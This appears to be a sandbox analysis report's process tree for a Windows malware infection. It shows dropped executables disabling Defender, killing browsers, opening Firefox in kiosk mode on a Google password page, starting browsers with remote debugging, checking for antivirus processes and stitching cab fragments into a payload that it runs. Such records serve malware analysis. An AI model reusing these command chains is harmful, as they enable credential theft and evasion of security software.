        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --remote-debugging-port=9229 --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --always-read-main-dll --field-trial-handle=4216,i,11679648629767031024,4644432939629990109,262144 --variations-seed-version --mojo-platform-channel-handle=4248 /prefetch:1
        5⤵
        Uses browser remote debugging
        
        PID:5672
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --extension-process --renderer-sub-type=extension --remote-debugging-port=9229 --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --always-read-main-dll --field-trial-handle=4236,i,11679648629767031024,4644432939629990109,262144 --variations-seed-version --mojo-platform-channel-handle=4252 /prefetch:2
        5⤵
        Uses browser remote debugging
        
        PID:5540
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=3636,i,11679648629767031024,4644432939629990109,262144 --variations-seed-version --mojo-platform-channel-handle=3736 /prefetch:8
        5⤵
        
        PID:6360
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=3732,i,11679648629767031024,4644432939629990109,262144 --variations-seed-version --mojo-platform-channel-handle=5320 /prefetch:8
        5⤵
        
        PID:6676
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=5260,i,11679648629767031024,4644432939629990109,262144 --variations-seed-version --mojo-platform-channel-handle=5288 /prefetch:8
        5⤵
        
        PID:2652
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=entity_extraction_service.mojom.Extractor --lang=en-US --service-sandbox-type=entity_extraction --onnx-enabled-for-ee --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=5272,i,11679648629767031024,4644432939629990109,262144 --variations-seed-version --mojo-platform-channel-handle=5380 /prefetch:8
        5⤵
        
        PID:4216
    - - C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\identity_helper.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --lang=en-US --service-sandbox-type=none --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=6524,i,11679648629767031024,4644432939629990109,262144 --variations-seed-version --mojo-platform-channel-handle=6548 /prefetch:8
        5⤵
        
        PID:6924
    - - C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\identity_helper.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --lang=en-US --service-sandbox-type=none --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=6524,i,11679648629767031024,4644432939629990109,262144 --variations-seed-version --mojo-platform-channel-handle=6548 /prefetch:8
        5⤵
        
        PID:6940
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=6644,i,11679648629767031024,4644432939629990109,262144 --variations-seed-version --mojo-platform-channel-handle=6696 /prefetch:8
        5⤵
        
        PID:2868
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=6848,i,11679648629767031024,4644432939629990109,262144 --variations-seed-version --mojo-platform-channel-handle=6852 /prefetch:8
        5⤵
        
        PID:1504
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=7112,i,11679648629767031024,4644432939629990109,262144 --variations-seed-version --mojo-platform-channel-handle=6872 /prefetch:8
        5⤵
        
        PID:5524
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=6952,i,11679648629767031024,4644432939629990109,262144 --variations-seed-version --mojo-platform-channel-handle=6692 /prefetch:8
        5⤵
        
        PID:5348
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=7116,i,11679648629767031024,4644432939629990109,262144 --variations-seed-version --mojo-platform-channel-handle=7136 /prefetch:8
        5⤵
        
        PID:6160
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=7292,i,11679648629767031024,4644432939629990109,262144 --variations-seed-version --mojo-platform-channel-handle=7304 /prefetch:8
        5⤵
        
        PID:6180
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=7452,i,11679648629767031024,4644432939629990109,262144 --variations-seed-version --mojo-platform-channel-handle=7464 /prefetch:8
        5⤵
        
        PID:6360
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=7480,i,11679648629767031024,4644432939629990109,262144 --variations-seed-version --mojo-platform-channel-handle=7468 /prefetch:8
        5⤵
        
        PID:4388
- - C:\Users\Admin\AppData\Local\Temp\10361730101\d0fba8cbde.exe
    "C:\Users\Admin\AppData\Local\Temp\10361730101\d0fba8cbde.exe"
    3⤵
    - Executes dropped EXE
    - System Location Discovery: System Language Discovery
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of FindShellTrayWindow
    - Suspicious use of SendNotifyMessage
    PID:2720
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /F /IM firefox.exe /T
      4⤵
      System Location Discovery: System Language Discovery
      Kills process with taskkill
      Suspicious use of AdjustPrivilegeToken
      PID:2032
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /F /IM chrome.exe /T
      4⤵
      System Location Discovery: System Language Discovery
      Kills process with taskkill
      Suspicious use of AdjustPrivilegeToken
      PID:4672
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /F /IM msedge.exe /T
      4⤵
      System Location Discovery: System Language Discovery
      Kills process with taskkill
      Suspicious use of AdjustPrivilegeToken
      PID:4760
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /F /IM opera.exe /T
      4⤵
      System Location Discovery: System Language Discovery
      Kills process with taskkill
      Suspicious use of AdjustPrivilegeToken
      PID:1084
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /F /IM brave.exe /T
      4⤵
      System Location Discovery: System Language Discovery
      Kills process with taskkill
      Suspicious use of AdjustPrivilegeToken
      PID:1584
  - - C:\Program Files\Mozilla Firefox\firefox.exe
      "C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk "https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd" --no-default-browser-check --disable-popup-blocking
      4⤵
      PID:5356
    - - C:\Program Files\Mozilla Firefox\firefox.exe
        
        "C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd --no-default-browser-check --disable-popup-blocking
        5⤵
        Drops desktop.ini file(s)
        Checks processor information in registry
        Modifies registry class
        Suspicious use of AdjustPrivilegeToken
        Suspicious use of FindShellTrayWindow
        Suspicious use of SendNotifyMessage
        Suspicious use of SetWindowsHookEx
        
        PID:1392
      - C:\Program Files\Mozilla Firefox\firefox.exe
        
        "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -parentBuildID 20250130195129 -prefsHandle 2012 -prefsLen 27099 -prefMapHandle 2016 -prefMapSize 270279 -ipcHandle 2092 -initialChannelId {dfa8ddf3-6388-4fb5-8305-fc975c0ffd80} -parentPid 1392 -crashReporter "\\.\pipe\gecko-crash-server-pipe.1392" -appDir "C:\Program Files\Mozilla Firefox\browser" - 1 gpu
        6⤵
        
        PID:448
      - C:\Program Files\Mozilla Firefox\firefox.exe
        
        "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -parentBuildID 20250130195129 -prefsHandle 2476 -prefsLen 27135 -prefMapHandle 2480 -prefMapSize 270279 -ipcHandle 2488 -initialChannelId {fe2ed4d4-2274-4426-be52-aad97504815b} -parentPid 1392 -crashReporter "\\.\pipe\gecko-crash-server-pipe.1392" -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - 2 socket
        6⤵
        
        PID:4060
      - C:\Program Files\Mozilla Firefox\firefox.exe
        
        "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -isForBrowser -prefsHandle 3812 -prefsLen 25164 -prefMapHandle 3816 -prefMapSize 270279 -jsInitHandle 3820 -jsInitLen 253512 -parentBuildID 20250130195129 -ipcHandle 3828 -initialChannelId {0c680f5b-462d-401c-a062-4be186006a1c} -parentPid 1392 -crashReporter "\\.\pipe\gecko-crash-server-pipe.1392" -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - 3 tab
        6⤵
        Checks processor information in registry
        
        PID:4500
      - C:\Program Files\Mozilla Firefox\firefox.exe
        
        "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -parentBuildID 20250130195129 -prefsHandle 3980 -prefsLen 27276 -prefMapHandle 3984 -prefMapSize 270279 -ipcHandle 4052 -initialChannelId {02409321-e47c-4e86-b0ce-1614a899a699} -parentPid 1392 -crashReporter "\\.\pipe\gecko-crash-server-pipe.1392" -appDir "C:\Program Files\Mozilla Firefox\browser" - 4 rdd
        6⤵
        
        PID:5868
      - C:\Program Files\Mozilla Firefox\firefox.exe
        
        "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -isForBrowser -prefsHandle 4556 -prefsLen 34775 -prefMapHandle 4560 -prefMapSize 270279 -jsInitHandle 4564 -jsInitLen 253512 -parentBuildID 20250130195129 -ipcHandle 4572 -initialChannelId {7488d36a-ed6e-4901-bb8f-86953182afd8} -parentPid 1392 -crashReporter "\\.\pipe\gecko-crash-server-pipe.1392" -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - 5 tab
        6⤵
        Checks processor information in registry
        
        PID:2804
      - C:\Program Files\Mozilla Firefox\firefox.exe
        
        "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -parentBuildID 20250130195129 -sandboxingKind 0 -prefsHandle 5140 -prefsLen 35012 -prefMapHandle 5144 -prefMapSize 270279 -ipcHandle 5152 -initialChannelId {bfac9f38-4f9e-4e9e-b1bd-f22b059223fb} -parentPid 1392 -crashReporter "\\.\pipe\gecko-crash-server-pipe.1392" -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - 6 utility
        6⤵
        Checks processor information in registry
        
        PID:6204
      - C:\Program Files\Mozilla Firefox\firefox.exe
        
        "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -isForBrowser -prefsHandle 5440 -prefsLen 32952 -prefMapHandle 5444 -prefMapSize 270279 -jsInitHandle 5448 -jsInitLen 253512 -parentBuildID 20250130195129 -ipcHandle 2668 -initialChannelId {03575e37-1941-4bfb-bcad-714bc7406ff1} -parentPid 1392 -crashReporter "\\.\pipe\gecko-crash-server-pipe.1392" -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - 7 tab
        6⤵
        Checks processor information in registry
        
        PID:6464
      - C:\Program Files\Mozilla Firefox\firefox.exe
        
        "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -isForBrowser -prefsHandle 5460 -prefsLen 32952 -prefMapHandle 5632 -prefMapSize 270279 -jsInitHandle 5636 -jsInitLen 253512 -parentBuildID 20250130195129 -ipcHandle 5644 -initialChannelId {6b700fb6-a5c9-4db2-87e2-c59d9c8c4b00} -parentPid 1392 -crashReporter "\\.\pipe\gecko-crash-server-pipe.1392" -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - 8 tab
        6⤵
        Checks processor information in registry
        
        PID:6476
      - C:\Program Files\Mozilla Firefox\firefox.exe
        
        "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -isForBrowser -prefsHandle 5816 -prefsLen 32952 -prefMapHandle 5820 -prefMapSize 270279 -jsInitHandle 5824 -jsInitLen 253512 -parentBuildID 20250130195129 -ipcHandle 5832 -initialChannelId {b2ec3d06-7d44-4ae5-9081-372ae0a60dcf} -parentPid 1392 -crashReporter "\\.\pipe\gecko-crash-server-pipe.1392" -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - 9 tab
        6⤵
        Checks processor information in registry
        
        PID:6504
      - C:\Program Files\Mozilla Firefox\firefox.exe
        
        "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -isForBrowser -prefsHandle 18124 -prefsLen 36905 -prefMapHandle 10520 -prefMapSize 270279 -jsInitHandle 4908 -jsInitLen 253512 -parentBuildID 20250130195129 -ipcHandle 3996 -initialChannelId {569a1635-aba0-4888-b5d3-e7f92f0ce90e} -parentPid 1392 -crashReporter "\\.\pipe\gecko-crash-server-pipe.1392" -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - 10 tab
        6⤵
        Checks processor information in registry
        
        PID:10424
      - C:\Program Files\Mozilla Firefox\firefox.exe
        
        "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -isForBrowser -prefsHandle 19624 -prefsLen 36955 -prefMapHandle 19684 -prefMapSize 270279 -jsInitHandle 19524 -jsInitLen 253512 -parentBuildID 20250130195129 -ipcHandle 3924 -initialChannelId {1dee40ed-4cc0-4363-9705-0ca6bc302ddb} -parentPid 1392 -crashReporter "\\.\pipe\gecko-crash-server-pipe.1392" -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - 11 tab
        6⤵
        Checks processor information in registry
        
        PID:14520
- - C:\Users\Admin\AppData\Local\Temp\10361740101\ab7380df2b.exe
    "C:\Users\Admin\AppData\Local\Temp\10361740101\ab7380df2b.exe"
    3⤵
    - Modifies Windows Defender DisableAntiSpyware settings
    - Modifies Windows Defender Real-time Protection settings
    - Modifies Windows Defender TamperProtection settings
    - Modifies Windows Defender notification settings
    - Identifies VirtualBox via ACPI registry values (likely anti-VM)
    - Checks BIOS information in registry
    - Executes dropped EXE
    - Identifies Wine through registry keys
    - Windows security modification
    - Suspicious use of NtSetInformationThreadHideFromDebugger
    - System Location Discovery: System Language Discovery
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:1360
- - C:\Users\Admin\AppData\Local\Temp\10361750101\jokererer.exe
    "C:\Users\Admin\AppData\Local\Temp\10361750101\jokererer.exe"
    3⤵
    - Executes dropped EXE
    - Suspicious use of SetThreadContext
    PID:3416
  - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
      "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
      4⤵
      System Location Discovery: System Language Discovery
      Suspicious behavior: EnumeratesProcesses
      PID:7164
- - C:\Users\Admin\AppData\Local\Temp\10361760101\UYpk7xI.exe
    "C:\Users\Admin\AppData\Local\Temp\10361760101\UYpk7xI.exe"
    3⤵
    - Executes dropped EXE
    - Suspicious use of SetThreadContext
    PID:5416
  - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
      "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
      4⤵
      System Location Discovery: System Language Discovery
      Checks processor information in registry
      PID:2716
    - - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default"
        5⤵
        Uses browser remote debugging
        Checks processor information in registry
        Enumerates system info in registry
        Modifies data under HKEY_USERS
        Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
        Suspicious use of AdjustPrivilegeToken
        
        PID:3124
      - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=133.0.6943.60 --initial-client-data=0xf8,0xfc,0x100,0xd4,0x104,0x7fffbfcfdcf8,0x7fffbfcfdd04,0x7fffbfcfdd10
        6⤵
        
        PID:2884
      - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --string-annotations --field-trial-handle=1780,i,16345130905106928044,10585122376100627814,262144 --variations-seed-version --mojo-platform-channel-handle=2408 /prefetch:3
        6⤵
        
        PID:5812
      - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --string-annotations --field-trial-handle=2116,i,16345130905106928044,10585122376100627814,262144 --variations-seed-version --mojo-platform-channel-handle=2476 /prefetch:8
        6⤵
        
        PID:6880
      - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --string-annotations --gpu-preferences=UAAAAAAAAADgAAAEAAAAAAAAAAAAAAAAAABgAAEAAAAAAAAAAAAAAAAAAAACAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAEAAAAAAAAAAIAAAAAAAAAAgAAAAAAAAA --field-trial-handle=2396,i,16345130905106928044,10585122376100627814,262144 --variations-seed-version --mojo-platform-channel-handle=2392 /prefetch:2
        6⤵
        
        PID:6424
      - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --remote-debugging-port=9223 --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --field-trial-handle=2804,i,16345130905106928044,10585122376100627814,262144 --variations-seed-version --mojo-platform-channel-handle=3124 /prefetch:1
        6⤵
        Uses browser remote debugging
        
        PID:6368
      - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --remote-debugging-port=9223 --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --field-trial-handle=2812,i,16345130905106928044,10585122376100627814,262144 --variations-seed-version --mojo-platform-channel-handle=3184 /prefetch:1
        6⤵
        Uses browser remote debugging
        
        PID:5432
      - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --extension-process --enable-dinosaur-easter-egg-alt-images --remote-debugging-port=9223 --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --field-trial-handle=4012,i,16345130905106928044,10585122376100627814,262144 --variations-seed-version --mojo-platform-channel-handle=4032 /prefetch:2
        6⤵
        Uses browser remote debugging
        
        PID:6484
      - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --remote-debugging-port=9223 --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --field-trial-handle=4536,i,16345130905106928044,10585122376100627814,262144 --variations-seed-version --mojo-platform-channel-handle=4620 /prefetch:1
        6⤵
        Uses browser remote debugging
        
        PID:3920
      - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --field-trial-handle=4984,i,16345130905106928044,10585122376100627814,262144 --variations-seed-version --mojo-platform-channel-handle=4992 /prefetch:8
        6⤵
        
        PID:7036
      - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --video-capture-use-gpu-memory-buffer --string-annotations --field-trial-handle=5508,i,16345130905106928044,10585122376100627814,262144 --variations-seed-version --mojo-platform-channel-handle=5520 /prefetch:8
        6⤵
        
        PID:384
      - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --field-trial-handle=5596,i,16345130905106928044,10585122376100627814,262144 --variations-seed-version --mojo-platform-channel-handle=5064 /prefetch:8
        6⤵
        
        PID:2088
      - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --field-trial-handle=5752,i,16345130905106928044,10585122376100627814,262144 --variations-seed-version --mojo-platform-channel-handle=5764 /prefetch:8
        6⤵
        
        PID:4484
      - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --field-trial-handle=5888,i,16345130905106928044,10585122376100627814,262144 --variations-seed-version --mojo-platform-channel-handle=5900 /prefetch:8
        6⤵
        
        PID:6944
      - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --field-trial-handle=6048,i,16345130905106928044,10585122376100627814,262144 --variations-seed-version --mojo-platform-channel-handle=5924 /prefetch:8
        6⤵
        
        PID:456
      - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --message-loop-type-ui --video-capture-use-gpu-memory-buffer --string-annotations --field-trial-handle=4440,i,16345130905106928044,10585122376100627814,262144 --variations-seed-version --mojo-platform-channel-handle=5528 /prefetch:8
        6⤵
        
        PID:13088
      - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --message-loop-type-ui --video-capture-use-gpu-memory-buffer --string-annotations --field-trial-handle=3176,i,16345130905106928044,10585122376100627814,262144 --variations-seed-version --mojo-platform-channel-handle=6280 /prefetch:8
        6⤵
        
        PID:13096
      - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --message-loop-type-ui --video-capture-use-gpu-memory-buffer --string-annotations --field-trial-handle=6064,i,16345130905106928044,10585122376100627814,262144 --variations-seed-version --mojo-platform-channel-handle=6236 /prefetch:8
        6⤵
        
        PID:13104
      - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.546 --string-annotations --gpu-preferences=UAAAAAAAAADoAAAEAAAAAAAAAAAAAAAAAABgAAEAAAAAAAAAAAAAAAAAAABCAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAEAAAAAAAAAAIAAAAAAAAAAgAAAAAAAAA --field-trial-handle=6384,i,16345130905106928044,10585122376100627814,262144 --variations-seed-version --mojo-platform-channel-handle=6392 /prefetch:8
        6⤵
        
        PID:5580
      - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=on_device_model.mojom.OnDeviceModelService --lang=en-US --service-sandbox-type=on_device_model_execution --video-capture-use-gpu-memory-buffer --string-annotations --field-trial-handle=4744,i,16345130905106928044,10585122376100627814,262144 --variations-seed-version --mojo-platform-channel-handle=5428 /prefetch:8
        6⤵
        
        PID:24888
- - C:\Users\Admin\AppData\Local\Temp\10361770101\7IIl2eE.exe
    "C:\Users\Admin\AppData\Local\Temp\10361770101\7IIl2eE.exe"
    3⤵
    - Checks computer location settings
    - Executes dropped EXE
    - Drops file in Windows directory
    - System Location Discovery: System Language Discovery
    PID:6444
  - - C:\Windows\SysWOW64\CMD.exe
      "C:\Windows\system32\CMD.exe" /c copy Expectations.cab Expectations.cab.bat & Expectations.cab.bat
      4⤵
      System Location Discovery: System Language Discovery
      PID:5524
    - - C:\Windows\SysWOW64\tasklist.exe
        
        tasklist
        5⤵
        Enumerates processes with tasklist
        System Location Discovery: System Language Discovery
        Suspicious use of AdjustPrivilegeToken
        
        PID:2376
    - - C:\Windows\SysWOW64\findstr.exe
        
        findstr /I "opssvc wrsa"
        5⤵
        System Location Discovery: System Language Discovery
        
        PID:6416
    - - C:\Windows\SysWOW64\tasklist.exe
        
        tasklist
        5⤵
        Enumerates processes with tasklist
        System Location Discovery: System Language Discovery
        Suspicious use of AdjustPrivilegeToken
        
        PID:1332
    - - C:\Windows\SysWOW64\findstr.exe
        
        findstr "SophosHealth bdservicehost AvastUI AVGUI nsWscSvc ekrn"
        5⤵
        System Location Discovery: System Language Discovery
        
        PID:6656
    - - C:\Windows\SysWOW64\cmd.exe
        
        cmd /c md 418377
        5⤵
        System Location Discovery: System Language Discovery
        
        PID:2608
    - - C:\Windows\SysWOW64\extrac32.exe
        
        extrac32 /Y /E Leon.cab
        5⤵
        System Location Discovery: System Language Discovery
        
        PID:6432
    - - C:\Windows\SysWOW64\findstr.exe
        
        findstr /V "BEVERAGES" Compilation
        5⤵
        System Location Discovery: System Language Discovery
        
        PID:6380
    - - C:\Windows\SysWOW64\cmd.exe
        
        cmd /c copy /b 418377\Passwords.com + Playing + New + Realized + Uw + Jpeg + Badly + Asbestos + Seeds + Service + Basis + Via 418377\Passwords.com
        5⤵
        System Location Discovery: System Language Discovery
        
        PID:3868
    - - C:\Windows\SysWOW64\cmd.exe
        
        cmd /c copy /b ..\Pendant.cab + ..\Visitor.cab + ..\Illegal.cab + ..\Suddenly.cab + ..\Theology.cab + ..\Kidney.cab + ..\Flying.cab + ..\Tigers.cab N
        5⤵
        System Location Discovery: System Language Discovery
        
        PID:4360
    - - C:\Users\Admin\AppData\Local\Temp\418377\Passwords.com
        
        Passwords.com N
        5⤵
        Executes dropped EXE
